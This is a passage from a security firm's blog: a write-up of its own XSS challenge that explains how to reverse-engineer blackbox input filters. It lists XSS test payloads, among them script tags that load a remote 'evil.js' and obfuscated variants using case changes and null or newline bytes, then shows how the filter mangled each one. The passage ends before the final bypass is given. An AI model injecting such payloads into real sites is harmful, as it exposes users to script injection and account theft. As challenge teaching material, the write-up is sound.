• slider1

  • slider2

  • slider3

  • slider4
  • https://zdresearch.com
  • https://zdresearch.com
  • https://zdresearch.com
  • https://zdresearch.com

Penetration Testing

Our real world attack simulation service. click on image to learn more.

BA / WA (PoC/Exploits)

Our frequent , early and rapid vulnerability analysis service. click on image to learn more.

Advanced training

Our unique online/in-site offensive-security training. click on image to learn more.

Custom Research

Our custom vulnerability/code analysis and exploitation service. click on image to learn more.

ZDResearch XSS challenge one writeup

Written by ZD. Posted in Blog

As you may already know, we recently held our very first XSS challenge with the prize being a book of choice in information security. This challenge was a bit tricky and if you didn’t focus on the right path you would end up getting no results. We received around 10k requests (around 2MB of data, thanks for not using scanners) from attendees trying to solve our challenge.

The main goal of this challenge was divided into three criteria:

  • Reverse engineering of blackbox filters
  • Finding a way to bypass attribute RegExp filter
  • Finding a way to execute JavaScript without parenthesis

Now we will discuss all three problems…

Part I :  Reverse engineering of filters

For determining and understanding every input validation filter you have to test and inject some “inputs”. The challenge is XSS so you will try to inject HTML and JavaScript codes, and after a few tests you can understand some tags and some attributes are filtered.

The first test is obviously script tag itself. I will try by injecting the following payloads:

<script>alert(0);</script>
<scrIpt>alert(0);</script>
<script src="http://zdresearch.com/evil.js">
<%0ascript SrC="http://zdresearch.com/evil.js">
<scri%00ipt>alert(0);</script>

And I got the following results:

[+] Injected Data : _
[+] Injected Data : _
[+] Injected Data : _
[+] Injected Data : <_script_"_zdresearch_com_evil__">
[+] Injected Data : <scri_ipt>alert_0_;<_script>

Up to know I can easily understand script tag is filtered. On top of that, all src , / , http:// , .js , () words are filtered and replaced by underscore (_).
At this point we have to find a valid tag with attributes, for example we can go for a tag with href: